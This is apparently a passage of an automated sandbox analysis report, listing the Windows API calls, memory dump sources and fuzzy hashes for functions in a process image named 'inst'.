                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String$AllocException@8FreeThrow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1688122297-0
                                                                                                                                                                                                                      • Opcode ID: 047043b3f84bdb388e9114497f70b1b8e7841ec8afb2b87bff50eba56315152b
                                                                                                                                                                                                                      • Instruction ID: 45135e9496389539377615f9a53c5f89720bf60f95c8cb8cdc2b3276e65db2d3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 047043b3f84bdb388e9114497f70b1b8e7841ec8afb2b87bff50eba56315152b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77E086362002119BC3316F2D9804A1AF3F9AF94771B25481FF4D4E3101DFB4C8818B54
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000005,00B5BC8C,00A8AFA3,?), ref: 00AA67FA
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000,00B5BC8C,00A8AFA3,?), ref: 00AA6809
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ShowWindow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1268545403-0
                                                                                                                                                                                                                      • Opcode ID: 372f54e52d1d967e7aa4713a489ee0ef2eaeb9fca8e47d18188d4f264794d1f8
                                                                                                                                                                                                                      • Instruction ID: 6abf8181f0a1b9b4079a0f77ddca27764725da77a9564eff1b44d583e718523d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 372f54e52d1d967e7aa4713a489ee0ef2eaeb9fca8e47d18188d4f264794d1f8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8E01A31155600FAE2219B20CC0ABD9B6A5FB29705F58882AB191630E0D7B56841CF45
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 00AFE9D4
                                                                                                                                                                                                                        • Part of subcall function 00B04E30: __getptd_noexit.LIBCMT ref: 00B04E33
                                                                                                                                                                                                                        • Part of subcall function 00B04E30: __amsg_exit.LIBCMT ref: 00B04E40
                                                                                                                                                                                                                        • Part of subcall function 00AFE98B: __IsNonwritableInCurrentImage.LIBCMT ref: 00AFE99E
                                                                                                                                                                                                                        • Part of subcall function 00AFE98B: __getptd_noexit.LIBCMT ref: 00AFE9AE
                                                                                                                                                                                                                        • Part of subcall function 00AFE98B: __freeptd.LIBCMT ref: 00AFE9B8
                                                                                                                                                                                                                        • Part of subcall function 00AFE98B: ExitThread.KERNEL32 ref: 00AFE9C1
                                                                                                                                                                                                                      • __XcptFilter.LIBCMT ref: 00AFE9F5
                                                                                                                                                                                                                        • Part of subcall function 00B0AE94: __getptd_noexit.LIBCMT ref: 00B0AE9C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __getptd_noexit$CurrentExitFilterImageNonwritableThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 393088965-0
                                                                                                                                                                                                                      • Opcode ID: 23519beb42b18604eda96f4201d6c8da90da6ada350a124ec8d2c500804a234a
                                                                                                                                                                                                                      • Instruction ID: f226a1f343d8b77af3ef141a1ea5fdc5104399c751af0ff1e5bf43b1062be43e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23519beb42b18604eda96f4201d6c8da90da6ada350a124ec8d2c500804a234a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9CE0BFB55106049FD708ABA0D946E2E7765AF05311F200488F102672B2CA759D419A21
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • KillTimer.USER32(?,00002711), ref: 00AA663D
                                                                                                                                                                                                                      • PostMessageW.USER32(?,000009DD,00000000,00000000), ref: 00AA664F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: KillMessagePostTimer
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3249405171-0
                                                                                                                                                                                                                      • Opcode ID: 6795eecd78af96fe35dcf2c517471c898f319341c8487a62faedcc872a920c18
                                                                                                                                                                                                                      • Instruction ID: 1c4f4962691a15df80291fbce28ab73c0d10c9799c76f6e55960f14644eb977d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6795eecd78af96fe35dcf2c517471c898f319341c8487a62faedcc872a920c18
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6D0A931540210BFE7300B24DD0EF827BA8EB24B00F10842BF319B60E0EBB1EC60CA44
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 00AA665F
                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000002), ref: 00AA6672
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: IconNotifyShell_VisibleWindow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1820326197-0
                                                                                                                                                                                                                      • Opcode ID: 2ce40add671206a216985c46d8ebafc644fc5c3cac26a3b92ee539b1b2f4642b
                                                                                                                                                                                                                      • Instruction ID: 75d7d12d5f840d05a038748d3a3db8364174179e880e74ad540be2ed007de4a0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ce40add671206a216985c46d8ebafc644fc5c3cac26a3b92ee539b1b2f4642b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14D012329511316BF7202B219D0DBA769ADDF1A751F0A4839686AD71A0EF90CC0185E0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __fileno.LIBCMT ref: 00AFF434
                                                                                                                                                                                                                        • Part of subcall function 00AF98D1: __getptd_noexit.LIBCMT ref: 00AF98D1
                                                                                                                                                                                                                        • Part of subcall function 00AFA5B1: __decode_pointer.LIBCMT ref: 00AFA5BC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __decode_pointer__fileno__getptd_noexit
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4187974367-0
                                                                                                                                                                                                                      • Opcode ID: 41557f5f657fbe65f53c6ac8eba9fce2e22c78e33ec1a32d7e7d4c971ebcceb6
                                                                                                                                                                                                                      • Instruction ID: 9f8b20edca5d5b364a0f7597e926dfa4b094f625ea47dab41fb8fea9aac224e2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41557f5f657fbe65f53c6ac8eba9fce2e22c78e33ec1a32d7e7d4c971ebcceb6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14418371A0060C9FDB249FE989845BFBBB5AF80361B248679F66597540E770DE41CB40
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 431132790-0
                                                                                                                                                                                                                      • Opcode ID: 7b3b5c7fa18fe306ea11e8ba105d885eaa233c1f4331debfb892f413629247d7
                                                                                                                                                                                                                      • Instruction ID: 81066513ae0157d78b66b5b033bbc0aa67f91a82d6e77c2979bea1e2a1513fb2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b3b5c7fa18fe306ea11e8ba105d885eaa233c1f4331debfb892f413629247d7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57318E30A00119ABCF05EFA4D991DFEB7BABF84350B14401AF5169B293DB319A42DB94
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00AE44EA
                                                                                                                                                                                                                        • Part of subcall function 00AE42DE: __EH_prolog3.LIBCMT ref: 00AE42FD
                                                                                                                                                                                                                        • Part of subcall function 00AE42DE: GetDriveTypeW.KERNEL32(?,0000000C), ref: 00AE4327
                                                                                                                                                                                                                        • Part of subcall function 00AE2158: __EH_prolog3.LIBCMT ref: 00AE2177
                                                                                                                                                                                                                        • Part of subcall function 00AE2158: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000038), ref: 00AE21BD
                                                                                                                                                                                                                        • Part of subcall function 00AE2158: _memset.LIBCMT ref: 00AE21DF
                                                                                                                                                                                                                        • Part of subcall function 00AE2158: DeviceIoControl.KERNEL32(?,0004D030,?,00000028,?,00000028,?,00000000), ref: 00AE2236
                                                                                                                                                                                                                        • Part of subcall function 00AE2158: _memset.LIBCMT ref: 00AE226C
                                                                                                                                                                                                                        • Part of subcall function 00AE3BFD: __EH_prolog3_catch.LIBCMT ref: 00AE3C04
                                                                                                                                                                                                                        • Part of subcall function 00AE3BFD: CoCreateInstance.OLE32(00B3C868,00000000,00000001,00B3C798,?,00000038,00AE4568,?,?,?,?,?,0000001C,00ADEAD1,?,?), ref: 00AE3C22
                                                                                                                                                                                                                        • Part of subcall function 00AE3BFD: SysFreeString.OLEAUT32(?), ref: 00AE3C71
                                                                                                                                                                                                                        • Part of subcall function 00AE3BFD: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00AE3C88
                                                                                                                                                                                                                        • Part of subcall function 00AE3BFD: SysFreeString.OLEAUT32(?), ref: 00AE3D26
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: H_prolog3$CreateFreeString_memset$BlanketControlDeviceDriveFileH_prolog3_catchInstanceProxyType
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3646017727-0
                                                                                                                                                                                                                      • Opcode ID: c70992b54ef92632e97b715ddcd755a0ae354016f7418ab18ef7e9b7a97fd2f3
                                                                                                                                                                                                                      • Instruction ID: 83365fa9eff5ee1bffd792d9ba774f80afc8c41f955253dd2935458f857948a7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c70992b54ef92632e97b715ddcd755a0ae354016f7418ab18ef7e9b7a97fd2f3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E21D972D0015E9B9F11EF96C9818FEB7BDAF48350B144026EA11B7251E7309E45CBA0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,00000000,?), ref: 00A9EB65
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LongWindow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1378638983-0
                                                                                                                                                                                                                      • Opcode ID: f19ce434d599c6b3a1ce0aac80749d7080c22966f08a5b2e352b06388df6d396
                                                                                                                                                                                                                      • Instruction ID: 4b7b3ca713468c207750336b6f785b925216d607d0720579486555a5e8b868c1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f19ce434d599c6b3a1ce0aac80749d7080c22966f08a5b2e352b06388df6d396
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78219A35600709AFCF31CF15C984A9ABBF5EB08310F20891AF84B93662C632ED84CB91
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00ABEB38
                                                                                                                                                                                                                        • Part of subcall function 00AF5546: _malloc.LIBCMT ref: 00AF5560
                                                                                                                                                                                                                        • Part of subcall function 00ABE1E2: __EH_prolog3.LIBCMT ref: 00ABE1E9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: H_prolog3$_malloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1683881009-0
                                                                                                                                                                                                                      • Opcode ID: 8df291d44cb8cf0bdcbef2c901050c2b46043ef3990d0f91a4f43e8127a69b9d
                                                                                                                                                                                                                      • Instruction ID: 07adf7da8c9efcec796cd37e8a2d9b16c286ca65bd5678b3749ee036423774d1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8df291d44cb8cf0bdcbef2c901050c2b46043ef3990d0f91a4f43e8127a69b9d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4921A230A01208AFDB11DFA8C655BEDBBB9AF48300F148098FD46AB392CB718E40DB51
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00A7E080: GetCurrentProcessId.KERNEL32 ref: 00A7E084
                                                                                                                                                                                                                        • Part of subcall function 00A7E080: CreateFileW.KERNEL32 ref: 00A7E0AA
                                                                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?,C8A14FE6,?,00000000,?,?,00000000,00B2D2E0,000000FF,?,00A7B43F,?), ref: 00A7E465
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$CreateCurrentExistsPathProcess
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3040742104-0
                                                                                                                                                                                                                      • Opcode ID: 3121caa5f0387d4e49518fc071cf5cf50e8792e4cdcf0b949347f8f722d69f12
                                                                                                                                                                                                                      • Instruction ID: 09d339c90771fe50830311212673cb2be0108a7002e50cc7413b5bc4e190b428
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3121caa5f0387d4e49518fc071cf5cf50e8792e4cdcf0b949347f8f722d69f12
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E411E972604648ABE710CF55ED01BAAB7E8FB09754F04C5AAFC19D3680DB76A900C6A1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memcpy_s.LIBCMT ref: 00A7CFF8
                                                                                                                                                                                                                        • Part of subcall function 00A7D070: _memcpy_s.LIBCMT ref: 00A7D095
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memcpy_s
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2001391462-0
                                                                                                                                                                                                                      • Opcode ID: 8140b4b05a6dfbfc7074e475a2c5bdfb1bae4509e67bc3ab1c6f2e638c3f845e
                                                                                                                                                                                                                      • Instruction ID: bc765474799f5f0777314aa66d5e91ae3f668ed7edf45121d29dc89d76e84631
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8140b4b05a6dfbfc7074e475a2c5bdfb1bae4509e67bc3ab1c6f2e638c3f845e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2113C72201A059FD315DFA8C880D6AB3A9FF893207148A5EE65A8B351EB71ED05CB90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00AEF9AF: EnterCriticalSection.KERNEL32(00B5CD40,00000000,?,?,00A7DA81,00000000,?,?,?,?,00A7B6E0,?,00000000,?,?), ref: 00AEF9BC
                                                                                                                                                                                                                        • Part of subcall function 00AEF9AF: LeaveCriticalSection.KERNEL32(00B5CD40,00A7B364,?,00A7DA81,00000000,?,?,?,?,00A7B6E0,?,00000000,?,?), ref: 00AEF9D8
                                                                                                                                                                                                                      • FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,00A7B6E0,?,00000000,?,?), ref: 00A7DAA6
                                                                                                                                                                                                                        • Part of subcall function 00A7DC40: LoadResource.KERNEL32(00A7B364,00B2CD88,00000000,?,00A7DAB8,00000000,00000000,?,?,00000000,00000000,?,?,?,?,00A7B6E0), ref: 00A7DC4C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
